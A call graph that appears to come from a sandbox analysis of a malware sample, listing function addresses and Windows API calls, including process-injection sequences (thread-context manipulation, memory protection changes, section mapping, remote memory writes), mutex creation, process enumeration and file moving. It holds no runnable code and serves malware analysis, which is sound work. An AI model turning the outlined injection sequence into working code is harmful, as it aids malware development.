11438->11435 11439 346b6e3 7 API calls 11438->11439 11440 3466248 11439->11440 11743 3465c8c 11440->11743 11800 34660bf 11444->11800 12963 3468dc9 RtlAllocateHeap 11445->12963 11447 346359e 11451 34635d5 11447->11451 12964 3468dc9 RtlAllocateHeap 11447->12964 11449 34635af 11450 34698d0 2 API calls 11449->11450 11449->11451 11450->11451 11451->11341 11452->11363 11454 346ca21 11453->11454 11455 346ca25 11454->11455 11541 346c9f3 11454->11541 11455->11368 11458 346ca4a FindCloseChangeNotification 11459 346ca36 11458->11459 11459->11368 11554 346c92f GetCurrentThread OpenThreadToken 11460->11554 11463 346cb10 11463->11367 11464 346c986 6 API calls 11468 346ca8e FindCloseChangeNotification 11464->11468 11466 346cb06 11467 3468ddf 2 API calls 11466->11467 11467->11463 11468->11463 11468->11466 11471 346f3bf 11469->11471 11470 346e08e 11473 346f365 11470->11473 11471->11470 11559 3469ab3 11471->11559 11474 346f37c 11473->11474 11475 346f39c 11474->11475 11476 3469ab3 RtlAllocateHeap 11474->11476 11475->11373 11477 346f389 11476->11477 11477->11373 11564 346c778 11478->11564 11480 346c86e 11481 346c64d 11480->11481 11482 346c668 11481->11482 11483 3469f6b 2 API calls 11482->11483 11484 346c672 11483->11484 11579 34736d5 11484->11579 11486 346c6bd 11487 3468d87 2 API calls 11486->11487 11488 346c6c9 11487->11488 11491 3469bd5 11488->11491 11489 346c687 11489->11486 11490 34736d5 2 API calls 11489->11490 11490->11489 11492 3469be1 MultiByteToWideChar 11491->11492 11493 3469bdc 11491->11493 11494 3469bf5 11492->11494 11493->11382 11494->11382 11496 3469f6b 2 API calls 11495->11496 11497 346c88b 11496->11497 11498 3469f6b 2 API calls 11497->11498 11500 346c89a 11498->11500 11499 346c92a 11508 346cbd7 11499->11508 11500->11499 11501 34736d5 2 API calls 11500->11501 11502 346c8eb 11500->11502 11501->11500 11503 34736d5 2 API calls 11502->11503 11504 346c916 11502->11504 11503->11502 11505 3468d87 2 API calls 11504->11505 11506 346c922 11505->11506 11507 3468d87 2 API calls 11506->11507 11507->11499 11509 346cbef 11508->11509 11510 346c986 6 API calls 11509->11510 11511 346cbf3 11509->11511 11512 346cc07 11510->11512 11511->11387 11512->11511 11513 3468ddf 2 API calls 11512->11513 11513->11511 11515 346dde4 11514->11515 11516 346ddd3 GetCurrentProcess IsWow64Process 11514->11516 11517 346dde7 11515->11517 11516->11515 11518 346ddf6 GetSystemInfo 11517->11518 11519 346ddf1 11517->11519 11518->11392 11519->11392 11521 346e31e 11520->11521 11522 3473586 11520->11522 11524 34698d0 11521->11524 11522->11521 11523 34736d5 2 API calls 11522->11523 11523->11522 11584 3469858 11524->11584 11527 346db68 11528 346dd4d 11527->11528 11529 3469f6b 2 API calls 11528->11529 11531 346dd7d 11528->11531 11533 3468d87 2 API calls 11528->11533 11598 3469d29 11528->11598 11529->11528 11590 346baf6 CreateToolhelp32Snapshot 11531->11590 11533->11528 11534 346dd99 11536 346ddb6 11534->11536 11604 3469e22 11534->11604 11536->11404 11538 3468f63 memset 11537->11538 11539 3469ff8 _vsnwprintf 11538->11539 11540 346a015 11539->11540 11540->11398 11544 346c986 GetTokenInformation 11541->11544 11545 346c9a8 GetLastError 11544->11545 11546 346c9c5 11544->11546 11545->11546 11547 346c9b3 11545->11547 11546->11458 11546->11459 11553 3468dc9 RtlAllocateHeap 11547->11553 11549 346c9bb 11549->11546 11550 346c9c9 GetTokenInformation 11549->11550 11550->11546 11551 346c9de 11550->11551 11552 3468ddf 2 API calls 11551->11552 11552->11546 11553->11549 11555 346c97c 11554->11555 11556 346c950 GetLastError 11554->11556 11555->11463 11555->11464 11556->11555 11557 346c95d OpenProcessToken 11556->11557 11557->11555 11560 3469abc 11559->11560 11562 3469ace 11559->11562 11563 3468dc9 RtlAllocateHeap 11560->11563 11562->11470 11563->11562 11565 3468f63 memset 11564->11565 11566 346c79a lstrcpynW 11565->11566 11568 3469f85 2 API calls 11566->11568 11569 346c7cf GetVolumeInformationW 11568->11569 11570 3468d9a 2 API calls 11569->11570 11571 346c804 11570->11571 11572 3469fe4 2 API calls 11571->11572 11573 346c825 lstrcatW 11572->11573 11577 346a5e9 11573->11577 11576 346c84b 11576->11480 11578 346a5f1 CharUpperBuffW 11577->11578 11578->11576 11580 34736e5 11579->11580 11581 3473718 lstrlenW 11580->11581 11582 3473735 _ftol2_sse 11581->11582 11582->11489 11585 3469868 11584->11585 11585->11585 11586 34736d5 2 API calls 11585->11586 11589 3469883 11586->11589 11587 34698b7 11587->11527 11588 34736d5 2 API calls 11588->11589 11589->11587 11589->11588 11591 346bb20 11590->11591 11592 346bb4b 11590->11592 11593 3468f63 memset 11591->11593 11592->11534 11594 346bb32 Process32First 11593->11594 11594->11592 11596 346bb59 11594->11596 11595 346bb7e FindCloseChangeNotification 11595->11592 11596->11595 11610 346daf2 11596->11610 11599 3469d3d 11598->11599 11613 3468dc9 RtlAllocateHeap 11599->11613 11602 3469e0c 11602->11528 11603 3469d95 11603->11602 11614 3468dc9 RtlAllocateHeap 11603->11614 11605 3469e6e 11604->11605 11608 3469e33 11604->11608 11605->11534 11606 3469e65 11607 3468ddf 2 API calls 11606->11607 11607->11605 11608->11605 11608->11606 11609 3468ddf 2 API calls 11608->11609 11609->11608 11611 346db54 Sleep 11610->11611 11612 346db03 11610->11612 11611->11596 11612->11611 11613->11603 11614->11603 11616 346d7e7 11615->11616 11646 3468dc9 RtlAllocateHeap 11616->11646 11618 3469f85 2 API calls 11621 346d81b 11618->11621 11619 346d878 11619->11408 11623 346b6e3 11619->11623 11620 3468d9a 2 API calls 11620->11621 11621->11618 11621->11619 11621->11620 11622 3469ab3 RtlAllocateHeap 11621->11622 11622->11621 11624 346b6fc 11623->11624 11647 346b632 11624->11647 11628 3468f63 memset 11627->11628 11629 346be26 11628->11629 11630 3468f63 memset 11629->11630 11631 346be33 CreateProcessW 11630->11631 11631->11420 11656 346d309 11632->11656 11639 3468f63 memset 11640 346da24 GetThreadContext 11639->11640 11641 346da4e NtProtectVirtualMemory 11640->11641 11643 346dace 11640->11643 11642 346da90 NtWriteVirtualMemory 11641->11642 11641->11643 11642->11643 11644 346daad NtProtectVirtualMemory 11642->11644 11703 346d47c 11643->11703 11644->11643 11645->11420 11646->11621 11648 347357b 2 API calls 11647->11648 11649 346b64a 11648->11649 11650 3469f6b 2 API calls 11649->11650 11651 346b674 11650->11651 11652 3469fa5 2 API calls 11651->11652 11653 346b6d2 11652->11653 11654 3468d87 2 API calls 11653->11654 11655 346b6dd 11654->11655 11655->11420 11657 346d337 11656->11657 11658 346d325 11656->11658 11660 3469f85 2 API calls 11657->11660 11658->11657 11659 346d464 11658->11659 11659->11643 11682 346d538 11659->11682 11661 346d344 11660->11661 11662 3469fe4 2 API calls 11661->11662 11663 346d37d 11662->11663 11664 3469f85 2 API calls 11663->11664 11665 346d39c 11664->11665 11708 3469c50 11665->11708 11668 3468d9a 2 API calls 11669 346d3c4 11668->11669 11670 3469c50 2 API calls 11669->11670 11671 346d3e7 LoadLibraryW 11670->11671 11673 346d412 11671->11673 11674 346d420 11671->11674 11675 346f08e 3 API calls 11673->11675 11676 3468ddf 2 API calls 11674->11676 11675->11674 11677 346d435 11676->11677 11678 3468f63 memset 11677->11678 11679 346d447 11678->11679 11679->11659 11680 3468ddf 2 API calls 11679->11680 11681 346d462 11680->11681 11681->11659 11683 346d56b 11682->11683 11684 346d58c NtCreateSection 11683->11684 11686 346d77f 11683->11686 11685 346d5b5 RegisterClassExA 11684->11685 11684->11686 11687 346d645 NtMapViewOfSection 11685->11687 11688 346d609 CreateWindowExA 11685->11688 11689 346d7b4 11686->11689 11694 346d7b0 NtUnmapViewOfSection 11686->11694 11687->11686 11695 346d678 NtMapViewOfSection 11687->11695 11688->11687 11690 346d633 DestroyWindow UnregisterClassA 11688->11690 11691 346d7bd NtClose 11689->11691 11692 346d7c8 11689->11692 11690->11687 11691->11692 11692->11639 11692->11643 11694->11689 11695->11686 11696 346d69c 11695->11696 11697 3468e2e RtlAllocateHeap 11696->11697 11698 346d6ac 11697->11698 11698->11686 11699 346d6bb VirtualAllocEx WriteProcessMemory 11698->11699 11700 3468ddf 2 API calls 11699->11700 11701 346d702 11700->11701 11702 346d765 lstrlenW 11701->11702 11702->11686 11704 346d485 FreeLibrary 11703->11704 11706 346d493 11703->11706 11704->11706 11705 346d4b4 11705->11420 11706->11705 11707 3468ddf 2 API calls 11706->11707 11707->11705 11709 3469c62 11708->11709 11714 3468dc9 RtlAllocateHeap 11709->11714 11711 3469c81 11712 3469c9e 11711->11712 11713 3469c8d lstrcatW 11711->11713 11712->11668 11713->11711 11714->11711 11804 346a7c6 11715->11804 11718 3470cd9 11868 3468dc9 RtlAllocateHeap 11718->11868 11720 3470ce0 11721 3470cea 11720->11721 11869 346b553 11720->11869 11721->11425 11724 3470d2e 11724->11425 11729 3470ac8 14 API calls 11730 3470d2b 11729->11730 11730->11425 11906 346ab83 11731->11906 11734 3466319 11735 346b6e3 7 API calls 11734->11735 11736 3466336 11735->11736 11737 3466219 11736->11737 11738 3465c8c 10 API calls 11736->11738 11737->11431 11737->11432 11739 3466370 11738->11739 11739->11737 11937 346ab69 11739->11937 11742 3466382 lstrcmpiW 11742->11737 11744 346b6e3 7 API calls 11743->11744 11745 3465ca5 11744->11745 11746 3465cb2 11745->11746 11747 3469bfd 2 API calls 11745->11747 11748 3465cd5 11747->11748 11941 346b270 11748->11941 11750 3465ce5 11753 346b270 2 API calls 11750->11753 11754 3465d09 11750->11754 11751 3468ddf 2 API calls 11752 3465d15 11751->11752 11755 346618c 11752->11755 11753->11754 11754->11751 11756 346ab69 4 API calls 11755->11756 11757 3466196 11756->11757 11758 34661a4 lstrcmpiW 11757->11758 11759 346619f 11757->11759 11760 34661d6 11758->11760 11761 34661ba 11758->11761 11759->11444 11763 3468ddf 2 API calls 11760->11763 11946 346ac61 11761->11946 11763->11759 11995 3468dc9 RtlAllocateHeap 11766->11995 11768 34660eb 11769 34660fe GetDriveTypeW 11768->11769 11770 346612f 11768->11770 11769->11770 11996 3462bee 11770->11996 11772 346614b 11773 3466169 11772->11773 12015 3465315 11772->12015 12068 346b162 11773->12068 11777 346b162 2 API calls 11778 3466185 11777->11778 11778->11434 11780 346109a 2 API calls 11779->11780 11781 3470ad7 11780->11781 12607 34667db memset 11781->12607 11784 3468d9a 2 API calls 11785 3470afd 11784->11785 11786 3470b76 11785->11786 12619 346aaff 11785->12619 11786->11444 11790 3470b28 11790->11786 11791 346109a 2 API calls 11790->11791 11792 3470b3a 11791->11792 11793 3469fe4 2 API calls 11792->11793 11794 3470b49 11793->11794 11795 346b787 2 API calls 11794->11795 11796 3470b5c 11795->11796 11797 3470b6a 11796->11797 12623 346af67 11796->12623 11799 3468ddf 2 API calls 11797->11799 11799->11786 11801 34660d1 11800->11801 12636 34659f4 11801->12636 11843 3468dc9 RtlAllocateHeap 11804->11843 11806 346a7f0 11807 34661f3 11806->11807 11844 346c5c6 11806->11844 11807->11424 11807->11425 11807->11718 11810 3469f6b 2 API calls 11811 346a830 11810->11811 11812 346a96e 11811->11812 11816 346a85c 11811->11816 11813 346a980 11812->11813 11814 346a9bf 11812->11814 11817 3469bfd 2 API calls 11813->11817 11838 346a96a 11813->11838 11815 3469bfd 2 API calls 11814->11815 11815->11838 11816->11838 11854 3469bfd 11816->11854 11817->11838 11818 3468d87 2 API calls 11821 346a9df 11818->11821 11820 3468ddf 2 API calls 11822 346aa75 11820->11822 11821->11820 11833 346aa3a 11821->11833 11823 3468f63 memset 11822->11823 11823->11833 11824 346a924 11830 3469bfd 2 API calls 11824->11830 11826 3469f85 2 API calls 11827 346a8c2 11826->11827 11829 3469c50 2 API calls 11827->11829 11828 3468ddf 2 API calls 11828->11807 11831 346a8d4 11829->11831 11832 346a94b 11830->11832 11834 3468d9a 2 API calls 11831->11834 11836 3468ddf 2 API calls 11832->11836 11833->11828 11833->11833 11835 346a8e2 11834->11835 11860 3469b26 11835->11860 11836->11838 11838->11818 11840 3468ddf 2 API calls 11841 346a919 11840->11841 11842 3468ddf 2 API calls 11841->11842 11842->11824 11843->11806 11845 346c5df 11844->11845 11846 34736d5 2 API calls 11845->11846 11847 346c5ef 11846->11847 11848 3469f6b 2 API calls 11847->11848 11849 346c5fe 11848->11849 11850 346c63a 11849->11850 11853 34736d5 2 API calls 11849->11853 11851 3468d87 2 API calls 11850->11851 11852 346a811 11851->11852 11852->11810 11853->11849 11855 3469c0f 11854->11855 11866 3468dc9 RtlAllocateHeap 11855->11866 11857 3469c2c 11858 3469c38 lstrcatA 11857->11858 11859 3469c49 11857->11859 11858->11857 11859->11821 11859->11824 11859->11826 11861 3469b2f 11860->11861 11862 3469b5c 11860->11862 11867 3468dc9 RtlAllocateHeap 11861->11867 11862->11840 11864 3469b41 11864->11862 11865 3469b49 MultiByteToWideChar 11864->11865 11865->11862 11866->11857 11867->11864 11868->11720 11870 346b56b 11869->11870 11874 346b564 11869->11874 11871 346b595 11870->11871 11870->11874 11900 3468dc9 RtlAllocateHeap 11870->11900 11873 3468ddf 2 API calls 11871->11873 11871->11874 11873->11874 11874->11724 11875 3470b84 11874->11875 11901 3468dc9 RtlAllocateHeap 11875->11901 11877 3470cd1 11896 346fb9c 11877->11896 11878 3470b97 11878->11877 11879 3470c86 11878->11879 11880 346109a 2 API calls 11878->11880 11882 3468ddf 2 API calls 11879->11882 11881 3470bcd 11880->11881 11883 3469f85 2 API calls 11881->11883 11882->11877 11884 3470bf1 11883->11884 11885 3469c50 2 API calls 11884->11885 11886 3470c0f 11885->11886 11887 346b553 3 API calls 11886->11887 11888 3470c1c 11887->11888 11889 3468d9a 2 API calls 11888->11889 11890 3470c28 11889->11890 11891 3468d9a 2 API calls 11890->11891 11893 3470c31 11891->11893 11892 3468ddf 2 API calls 11894 3470c7b 11892->11894 11893->11892 11895 3468ddf 2 API calls 11894->11895 11895->11879 11897 346fbc0 11896->11897 11902 3470485 11897->11902 11900->11871 11901->11878 11904 347049e 11902->11904 11903 34704bf lstrlenW 11905 346fbd2 11903->11905 11904->11903 11904->11904 11905->11729 11909 346ab93 11906->11909 11914 346acb3 11909->11914 11912 346602f 11912->11734 11913 3468ddf 2 API calls 11913->11912 11915 346acd5 11914->11915 11928 346a766 11915->11928 11917 346abac 11917->11912 11917->11913 11918 346acdf 11918->11917 11931 346ceb8 11918->11931 11920 3468ddf 2 API calls 11920->11917 11921 346ad13 11922 3470485 lstrlenW 11921->11922 11926 346adac 11921->11926 11923 346ad64 11922->11923 11925 3468e2e RtlAllocateHeap 11923->11925 11927 346ad87 11923->11927 11924 3468ddf 2 API calls 11924->11926 11925->11927 11926->11920 11927->11924 11935 3468dc9 RtlAllocateHeap 11928->11935 11930 346a772 11930->11918 11932 346cede 11931->11932 11934 346cee2 11932->11934 11936 3468dc9 RtlAllocateHeap 11932->11936 11934->11921 11935->11930 11936->11934 11938 346ab6e 11937->11938 11939 346acb3 4 API calls 11938->11939 11940 346637e 11939->11940 11940->11737 11940->11742 11942 346b27f 11941->11942 11943 346b27a 11941->11943 11944 346b296 GetLastError 11942->11944 11945 346b2a1 GetLastError 11942->11945 11943->11750 11944->11943 11945->11943 11962 346ac6f 11946->11962 11949 346c402 SetFileAttributesW 11950 3468f63 memset 11949->11950 11951 346c42f 11950->11951 11952 34736d5 2 API calls 11951->11952 11961 346c450 11951->11961 11953 346c46c 11952->11953 11954 3469fe4 2 API calls 11953->11954 11955 346c47d 11954->11955 11956 3469c50 2 API calls 11955->11956 11957 346c48e 11956->11957 11957->11961 11983 346c32f 11957->11983 11960 3468ddf 2 API calls 11960->11961 11961->11760 11963 346ac7f 11962->11963 11966 346adde 11963->11966 11967 346adfb 11966->11967 11979 34661cb 11966->11979 11968 34736d5 2 API calls 11967->11968 11967->11979 11969 346ae3f 11968->11969 11982 3468dc9 RtlAllocateHeap 11969->11982 11971 346ae53 11972 347357b 2 API calls 11971->11972 11971->11979 11973 346ae95 11972->11973 11974 3470485 lstrlenW 11973->11974 11975 346aed6 11974->11975 11976 346a766 RtlAllocateHeap 11975->11976 11980 346aee2 11976->11980 11977 346af4c 11978 3468ddf 2 API calls 11977->11978 11978->11979 11979->11760 11979->11949 11980->11977 11981 3468ddf 2 API calls 11980->11981 11981->11977 11982->11971 11984 346c352 11983->11984 11985 346c35a memset 11984->11985 11994 346c3c9 11984->11994 11986 3469f85 2 API calls 11985->11986 11987 346c376 11986->11987 11988 34736d5 2 API calls 11987->11988 11989 346c392 11988->11989 11990 3469fe4 2 API calls 11989->11990 11991 346c3a8 11990->11991 11992 3468d9a 2 API calls 11991->11992 11993 346c3b1 MoveFileW 11992->11993 11993->11994 11994->11960 11995->11768 11997 3461080 2 API calls 11996->11997 11998 3462c07 11997->11998 12076 346b330 11998->12076 12001 3468d87 2 API calls 12002 3462c2a 12001->12002 12003 3462c5a 12002->12003 12004 3461080 2 API calls 12002->12004 12003->11772 12005 3462c38 12004->12005 12086 3469124 12005->12086 12008 3468d87 2 API calls 12009 3462c56 12008->12009 12009->12003 12094 346b12f 12009->12094 12011 3462c70 12107 34694d4 12011->12107 12014 3468ddf 2 API calls 12014->12003 12192 346f1c7 12015->12192 12018 3465582 12018->11773 12019 346c85a 9 API calls 12020 346533a 12019->12020 12021 346b6e3 7 API calls 12020->12021 12022 3465346 12021->12022 12205 346b222 12022->12205 12024 3465352 12024->12018 12025 346f0d9 8 API calls 12024->12025 12026 3465371 12025->12026 12027 3469f85 2 API calls 12026->12027 12028 3465382 12027->12028 12029 3469c50 2 API calls 12028->12029 12030 346539b 12029->12030 12031 3468d9a 2 API calls 12030->12031 12033 34653ae 12031->12033 12032 34653c1 12035 3468ddf 2 API calls 12032->12035 12033->12032 12210 346b145 12033->12210 12036 34653d6 12035->12036 12216 346503f memset 12036->12216 12039 3468f63 memset 12040 346542e 12039->12040 12272 346f323 12040->12272 12041 346558b 12042 3469f85 2 API calls 12041->12042 12043 3465595 12042->12043 12045 3469c50 2 API calls 12043->12045 12049 34655ac 12045->12049 12046 3468d9a 2 API calls 12048 34655e8 lstrcpynW lstrcpynW 12046->12048 12050 346562d 12048->12050 12051 3468ddf 2 API calls 12049->12051 12053 34655dc 12049->12053 12052 3468ddf 2 API calls 12050->12052 12051->12053 12054 346563f 12052->12054 12053->12046 12056 3468ddf 2 API calls 12054->12056 12055 34654af 12277 3468dc9 RtlAllocateHeap 12055->12277 12056->12018 12058 346550b 12058->12018 12059 3469f85 2 API calls 12058->12059 12073 346b171 12068->12073 12075 346617d 12068->12075 12069 346b196 12070 3468ddf 2 API calls 12069->12070 12072 346b1a1 12070->12072 12071 3468ddf 2 API calls 12071->12073 12074 3468ddf 2 API calls 12072->12074 12073->12069 12073->12071 12074->12075 12075->11777 12077 3469b26 2 API calls 12076->12077 12080 346b350 12077->12080 12078 34736d5 2 API calls 12079 346b36f FindResourceW 12078->12079 12079->12080 12081 346b39d 12079->12081 12080->12078 12080->12081 12082 3468ddf 2 API calls 12081->12082 12083 346b3a8 12082->12083 12084 3468e2e RtlAllocateHeap 12083->12084 12085 3462c1a 12083->12085 12084->12085 12085->12001 12087 3469133 12086->12087 12089 3462c47 12086->12089 12119 3468dc9 RtlAllocateHeap 12087->12119 12089->12008 12090 346913d 12090->12089 12120 3469029 12090->12120 12093 3468ddf 2 API calls 12093->12089 12095 3469124 4 API calls 12094->12095 12096 346b074 12095->12096 12097 346b13d 12096->12097 12163 34692a4 12096->12163 12097->12011 12101 346b128 12101->12011 12102 346b120 12103 34694d4 6 API calls 12102->12103 12103->12101 12104 346b08e 12104->12101 12104->12102 12105 3468e5d 3 API calls 12104->12105 12169 3469a76 12104->12169 12105->12104 12108 34694e3 12107->12108 12118 3462c7b 12107->12118 12109 346951d 12108->12109 12111 3468ddf 2 API calls 12108->12111 12108->12118 12110 346952d 12109->12110 12174 34695fb 12109->12174 12113 3469548 12110->12113 12115 3468ddf 2 API calls 12110->12115 12111->12108 12114 346955e 12113->12114 12116 3468ddf 2 API calls 12113->12116 12117 3468ddf 2 API calls 12114->12117 12115->12113 12116->12114 12117->12118 12118->12014 12119->12090 12134 3468dc9 RtlAllocateHeap 12120->12134 12122 346903e 12125 3469066 12122->12125 12133 346904b 12122->12133 12135 346957a 12122->12135 12123 34690ea 12126 3468ddf 2 API calls 12123->12126 12123->12133 12125->12123 12127 34690b4 12125->12127 12128 346957a lstrlenW 12125->12128 12126->12133 12127->12123 12127->12133 12139 346fd9c 12127->12139 12128->12127 12131 3469104 12132 3468ddf 2 API calls 12131->12132 12132->12133 12133->12089 12133->12093 12134->12122 12136 346959a 12135->12136 12137 3470485 lstrlenW 12136->12137 12138 34695be 12137->12138 12138->12125 12154 3468dc9 RtlAllocateHeap 12139->12154 12141 3468ddf 2 API calls 12143 346ff55 12141->12143 12142 346fdc0 12151 346ff2f 12142->12151 12155 3468dc9 RtlAllocateHeap 12142->12155 12145 3468ddf 2 API calls 12143->12145 12147 346ff63 12145->12147 12146 346fde0 12146->12151 12156 3468dc9 RtlAllocateHeap 12146->12156 12148 34690e3 12147->12148 12150 3468ddf 2 API calls 12147->12150 12148->12123 12148->12131 12150->12148 12151->12141 12152 346fdf4 12152->12151 12157 3468e5d 12152->12157 12154->12142 12155->12146 12156->12152 12162 3468dc9 RtlAllocateHeap 12157->12162 12159 3468e9a 12159->12152 12160 3468e72 12160->12159 12161 3468ddf 2 API calls 12160->12161 12161->12159 12162->12160 12166 34692c7 12163->12166 12164 3468dc9 RtlAllocateHeap 12164->12166 12165 34693fb 12168 3468dc9 RtlAllocateHeap 12165->12168 12166->12164 12166->12165 12167 3468ddf 2 API calls 12166->12167 12167->12166 12168->12104 12170 3469a81 12169->12170 12171 3469a97 12169->12171 12173 3468dc9 RtlAllocateHeap 12170->12173 12171->12104 12173->12171 12186 3468dc9 RtlAllocateHeap 12174->12186 12176 346963e 12176->12110 12177 3469634 12177->12176 12178 3469667 12177->12178 12180 34696e5 12177->12180 12187 3468fb1 12178->12187 12181 3470485 lstrlenW 12180->12181 12184 34696dd 12181->12184 12182 3469673 12183 3470485 lstrlenW 12182->12183 12183->12184 12185 3468ddf 2 API calls 12184->12185 12185->12176 12186->12177 12188 34736d5 2 API calls 12187->12188 12191 3468fca 12188->12191 12189 3468ff7 12189->12182 12190 34736d5 2 API calls 12190->12191 12191->12189 12191->12190 12193 346f1dd 12192->12193 12198 3465328 12192->12198 12194 3469f6b 2 API calls 12193->12194 12195 346f1e9 12194->12195 12196 3469f6b 2 API calls 12195->12196 12197 346f1f8 12196->12197 12197->12198 12199 346f205 GetModuleHandleA 12197->12199 12198->12018 12198->12019 12200 346f212 GetModuleHandleA 12199->12200 12201 346f219 12199->12201 12200->12201 12202 3468d87 2 API calls 12201->12202 12203 346f224 12202->12203 12204 3468d87 2 API calls 12203->12204 12204->12198 12206 346b236 12205->12206 12207 346b246 GetLastError 12206->12207 12208 346b23c GetLastError 12206->12208 12209 346b253 12207->12209 12208->12209 12209->12024 12285 3469183 12210->12285 12212 346b151 12213 346b157 12212->12213 12305 346b074 12212->12305 12213->12032 12217 3465075 12216->12217 12218 34650aa 12217->12218 12318 346308a 12217->12318 12220 346c85a 9 API calls 12218->12220 12230 346510f 12218->12230 12221 34650ba 12220->12221 12222 346c64d 6 API calls 12221->12222 12223 34650ca 12222->12223 12334 3464ffb 12223->12334 12230->12039 12230->12041 12551 346f233 12272->12551 12275 3465464 12275->12041 12275->12055 12276 346f233 39 API calls 12276->12275 12277->12058 12315 3468dc9 RtlAllocateHeap 12285->12315 12287 34691a4 12288 34691b5 lstrcpynW 12287->12288 12296 34691ae 12287->12296 12289 3469228 12288->12289 12290 34691d8 12288->12290 12316 3468dc9 RtlAllocateHeap 12289->12316 12292 346b553 3 API calls 12290->12292 12293 34691e4 12292->12293 12295 346924d 12293->12295 12297 3469029 4 API calls 12293->12297 12294 3469233 12294->12295 12294->12296 12300 3468ddf 2 API calls 12294->12300 12299 3469275 12295->12299 12302 3468ddf 2 API calls 12295->12302 12296->12212 12298 34691fe 12297->12298 12298->12294 12301 3469204 12298->12301 12303 3468ddf 2 API calls 12299->12303 12300->12295 12304 3468ddf 2 API calls 12301->12304 12302->12299 12303->12296 12304->12296 12306 34692a4 3 API calls 12305->12306 12307 346b087 12306->12307 12317 3468dc9 RtlAllocateHeap 12307->12317 12309 346b120 12310 34694d4 6 API calls 12309->12310 12311 346b128 12310->12311 12311->12032 12312 346b08e 12312->12309 12312->12311 12313 3468e5d 3 API calls 12312->12313 12314 3469a76 RtlAllocateHeap 12312->12314 12313->12312 12314->12312 12315->12287 12316->12294 12317->12312 12319 34630a6 12318->12319 12320 346109a 2 API calls 12319->12320 12333 3463141 12319->12333 12321 34630b9 12320->12321 12322 3469c50 2 API calls 12321->12322 12323 34630cb 12322->12323 12324 3468d9a 2 API calls 12323->12324 12325 34630d6 12324->12325 12326 346109a 2 API calls 12325->12326 12327 34630e0 12326->12327 12436 346cf54 12327->12436 12330 3468d9a 2 API calls 12333->12218 12335 3469b26 2 API calls 12334->12335 12336 3465006 12335->12336 12337 3469f85 2 API calls 12336->12337 12338 3465015 12337->12338 12339 3469c50 2 API calls 12338->12339 12340 3465021 12339->12340 12341 3468d9a 2 API calls 12340->12341 12342 346502c 12341->12342 12438 346cf81 12436->12438 12437 34630ee 12437->12330 12438->12437 12442 3468dc9 RtlAllocateHeap 12438->12442 12440 346cfb1 12440->12437 12442->12440 12553 346f267 12551->12553 12554 346f26b 12553->12554 12556 3468dc9 RtlAllocateHeap 12553->12556 12557 3464f5b 12553->12557 12554->12275 12554->12276 12556->12553 12558 3464f7e 12557->12558 12559 3464feb 12558->12559 12560 346503f 34 API calls 12558->12560 12559->12553 12562 3464f9e 12560->12562 12561 3464fdc 12580 3464e19 12561->12580 12562->12559 12562->12561 12565 346bcc1 12562->12565 12566 346bce2 12565->12566 12567 346bcdb 12565->12567 12568 346bcf6 12566->12568 12569 346bcee GetLastError 12566->12569 12567->12562 12569->12567 12581 346670a 5 API calls 12580->12581 12629 3468dc9 RtlAllocateHeap 12607->12629 12609 3466816 12610 3466987 12609->12610 12630 3468dc9 RtlAllocateHeap 12609->12630 12610->11784 12612 3466896 12613 3468ddf 2 API calls 12612->12613 12614 3466979 12613->12614 12615 3468ddf 2 API calls 12614->12615 12615->12610 12616 3468f63 memset 12617 3466830 12616->12617 12617->12610 12617->12612 12617->12616 12618 346c402 11 API calls 12617->12618 12618->12617 12631 346ab0e 12619->12631 12622 3468dc9 RtlAllocateHeap 12622->11790 12624 346af73 12623->12624 12625 346a766 RtlAllocateHeap 12624->12625 12626 346af9b 12625->12626 12627 3468ddf 2 API calls 12626->12627 12628 346b000 12626->12628 12627->12628 12628->11797 12629->12609 12630->12617 12632 346acb3 4 API calls 12631->12632 12633 346ab2d 12632->12633 12634 346ab0b 12633->12634 12635 3468ddf 2 API calls 12633->12635 12634->11786 12634->12622 12635->12634 12637 346aaff 4 API calls 12636->12637 12638 3465a05 12637->12638 12671 3465a67 12638->12671 12672 346b423 12638->12672 12641 346abf8 6 API calls 12642 3465a2b 12641->12642 12677 346f537 12642->12677 12645 346b6e3 7 API calls 12646 3465a49 12645->12646 12646->12671 12684 346a29b 12646->12684 12650 3465a7f 12702 3461486 CreateMutexW 12650->12702 12652 3465a84 12653 346a398 6 API calls 12652->12653 12654 3465a92 12653->12654 12717 34634f7 12654->12717 12671->11435 12673 346a1f8 GetSystemTimeAsFileTime 12672->12673 12674 346b42e 12673->12674 12675 346abc9 6 API calls 12674->12675 12676 3465a19 12675->12676 12676->12641 12678 346f0d9 8 API calls 12677->12678 12679 346f549 12678->12679 12680 346f0d9 8 API calls 12679->12680 12681 346f562 12680->12681 12781 346f4c6 12681->12781 12683 3465a32 12683->12645 12685 346a2ac 12684->12685 12686 3465a71 12685->12686 12795 3468dc9 RtlAllocateHeap 12685->12795 12688 346a398 12686->12688 12689 346a3b6 12688->12689 12690 346a40e 12689->12690 12701 346a3ba 12689->12701 12796 346a2ee 12689->12796 12691 346a41f 12690->12691 12802 3468dc9 RtlAllocateHeap 12690->12802 12693 346b222 2 API calls 12691->12693 12691->12701 12695 346a484 12693->12695 12696 346a4bf 12695->12696 12697 346a4fa SetThreadPriority 12695->12697 12698 346a4e3 12696->12698 12700 3468ddf 2 API calls 12696->12700 12697->12701 12699 3468f63 memset 12698->12699 12699->12701 12700->12698 12701->12650 12703 346149f CreateMutexW 12702->12703 12713 34614ec 12702->12713 12704 34614b1 12703->12704 12703->12713 12705 3461080 2 API calls 12704->12705 12706 34614bb 12705->12706 12707 3469a76 RtlAllocateHeap 12706->12707 12706->12713 12708 34614cb 12707->12708 12709 3468d87 2 API calls 12708->12709 12710 34614d8 12709->12710 12803 3468dc9 RtlAllocateHeap 12710->12803 12712 34614e2 12712->12713 12804 3468dc9 RtlAllocateHeap 12712->12804 12713->12652 12715 3461503 12715->12713 12805 34674d8 12715->12805 12718 3463505 12717->12718 12719 346350a 12717->12719 12809 346cb18 12718->12809 12721 34636a0 12719->12721 12722 346d210 8 API calls 12721->12722 12723 34636bb 12722->12723 12729 34636c4 12723->12729 12816 3468dc9 RtlAllocateHeap 12723->12816 12725 34636d8 12726 34636e2 12725->12726 12817 346ce93 12725->12817 12728 3468ddf 2 API calls 12726->12728 12728->12729 12734 3462e9f 12729->12734 12733 346a398 6 API calls 12733->12726 12735 346aaff 4 API calls 12734->12735 12736 3462ebd 12735->12736 12830 3462de9 12736->12830 12739 3462de9 3 API calls 12740 3462ee4 12739->12740 12834 346ab4b 12740->12834 12743 3462f38 12744 3469d29 RtlAllocateHeap 12782 346f4d4 12781->12782 12783 346f510 12781->12783 12794 3468dc9 RtlAllocateHeap 12782->12794 12784 